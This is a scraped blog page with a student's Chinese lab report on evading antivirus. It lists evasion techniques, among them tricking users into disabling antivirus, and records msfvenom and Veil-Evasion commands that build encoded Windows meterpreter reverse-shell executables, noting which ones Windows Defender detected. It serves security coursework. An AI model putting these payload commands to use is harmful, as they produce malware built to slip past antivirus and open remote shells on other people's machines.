20145202马超《网络对抗》免杀
http://www.cnblogs.com/lxm20145215----/p/6602938.html
基础问题回答
(1)杀软是如何检测出恶意代码的?
- 检查她的特征码
- 特征行为
- 也可以检测片面的特征。
(2)免杀是做什么? - 首先清楚杀毒软件的杀毒原理。
- 然后针对杀毒软件,自己相应的做出改变,防止杀毒软件检测出她的恶意行为。
(3)免杀的基本方法有哪些? - 改变特征码
- 加壳:压缩壳 加密壳
- 有shellcode(像Meterpreter)
- 用encode进行编码
- 基于payload重新编译生成可执行文件
- 改变行为
- 尽量使用反弹式连接
- 使用隧道技术
- 加密通讯数据
- 操作模式
- 基于内存操作
- 减少对系统的修改
- 加入混淆作用的正常功能代码
- 用其他语言进行重写再编译(veil-evasion)
- 使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中。
- 使用社工类攻击,诱骗目标关闭AV软件。
纯手工打造一个恶意软件
实践总结与体会
- 国产的杀毒软件质量差的一笔,比如江民杀毒和熊猫杀毒。
做病毒病不需要太多的技术而杀毒相对来说要付出非常多的努力,我们要跟家中是保护自己的电脑。
离实战还缺些什么技术或步骤?
我们是通过工具完成的病毒的制作,以后再进一步的话就应该自己制作出来能够构造病毒的程序就好了。
实践过程记录
msfvenom直接生成meterpreter可执行文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.115 PORT=1111 -f exe > test_mc.exe
windows自带的杀毒软剑直接杀掉了
Msfvenom使用编码器生成可执行文件
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.199.133 LPORT=1111 -f exe > mc-encoded.exe
来生成编码的可执行文件然后上传:
还是直接被杀掉:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 8 -b ‘\x00’ LHOST=192.168.199.133 LPORT=1111 -f exe > mc-encoded-8.exe
八次编码:
还是不行:
Veil-Evasion生成可执行文件
veil-evasion打开软件:
use python/meterpreter/rev_tcp
set LHOST 192.168.199.107
generate
mc-winmine
1
这次windows没有查出来直接放行了
上传到网站试试:
C语言调用Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.180 LPORT=208 -f c
生成一个c语言格式的Shellcode数组:
被杀掉
后续
实验指导
[http://git.oschina.net/wildlinux/NetSec/blob/master/ExpGuides/MAL_免杀原理与实践.md?dir=0&filepath=ExpGuides%2FMAL_免杀原理与实践.md&oid=33c5eba4957170076ea3af894b7df662e3fd4b11&sha=3197ea17455bacf495e6e3397a4d6d355c3c111c]
转载于:https://www.cnblogs.com/tuolemi/p/6585974.html
20145202马超《网络对抗》免杀相关推荐
- 20145202马超《网络对抗》Exp5MSF基础应用
20145202马超<网络对抗>Exp5MSF基础应用 本实践目标,掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...
- 2018-2019-2 网络对抗技术 20165239Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165239 Exp3 免杀原理与实践 win10 ip地址 192.168.18.1 fenix ip地址为 192.168.18.128 (1)杀软是如何 ...
- 2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用 ...
- 20145317 《网络对抗技术》免杀原理与实践
20145317 <网络对抗技术>免杀原理与实践 免杀技术 技术分类 改变特征码 加壳:使用专业的加壳软件,掩盖特征码: 使用encode等进行编码,进行异或.+1.-1等类似操作改变特征 ...
- 2018-2019 20165208 网络对抗 Exp3 免杀原理与实践
目录 2018-2019 20165208 网络对抗 Exp3 免杀原理与实践 实验内容 基础问题回答 实践过程记录 任务一:正确使用免杀工具或技巧 任务二:通过组合应用各种技术实现恶意代码免杀 任务 ...
- 2018-2019-2 20165209 《网络对抗技术》Exp3:免杀原理与实践
2018-2019-2 20165209 <网络对抗技术>Exp3:免杀原理与实践 1 免杀原理与实验内容 1.1 免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中 ...
- 2019-2020-2 20175227张雪莹《网络对抗技术》 Exp3 免杀原理与实践
2019-2020-2 20175227张雪莹<网络对抗技术> Exp3 免杀原理与实践 目录 0. 基础知识 1. 实验内容 1.1 方法 1.1.1 正确使用msf编码器 1.1.2 ...
- 2018-2019-2 20165315 《网络对抗技术》Exp3 免杀原理与实践
2018-2019-2 20165315 <网络对抗技术>Exp3 免杀原理与实践 一.实验内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion ...
- 20165214 2018-2019-2 《网络对抗技术》Exp3 免杀原理与实践 Week5
<网络对抗技术>Exp3 免杀原理与实践 Week5 一.实验内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shell ...
最新文章
- 和12岁小同志搞创客开发:手撕代码,点亮LED灯
- 百万级商品数据实时同步,查询结果秒出
- ansible模块command、shell、raw、script
- 一个自己整理的HASH类
- .Net里一个用于驱动摄像头的类
- 1.Docker的安装以及配置国内源
- webpack基础第一篇(配置文件)
- html字体渐变颜色的设置颜色代码,使用CSS3实现字体颜色渐变的实现
- 使用haskell来解线性方程
- 服务器计时器、Windows 计时器和线程计时器
- Oozie自带MapReduce示例的运行
- vim 编辑器 bash文件测试
- nginx: too many open files
- linux配置erp访问端口_nginx配置相同端口号访问多个项目
- Clang checker类总结
- 输入一个整数n,统计1-n之间的奇数和。你有几种办法实现?
- Java实现XML格式化
- Google Chrome 66可以下载啦
- sql语句关联关系的+号
- 【c语言】字符及字符串
热门文章
- Oracle PL / SQL – ACOS函数示例
- 进度压缩: 赶工与快速跟进
- 有趣的超短python代码_神级 Coder 绝不犯的错误:为炫耀编出超短码
- Vue.js项目更换皮肤,同时支持多套皮肤
- 春节回家之旅-神州租车给您带来极致美好体验
- 零售通动销增幅400% 天猫双11推动品牌交易额狂翻20倍
- django学习阶段总结:urls说明
- 鸿蒙os bate,鸿蒙os beta版下载
- 电视服务器绑上电池信号强吗,路由器天线上绑电池真的有用吗?可别被抖音给骗了!...
- 真好用!一招轻松获取图片中鼠标点击处坐标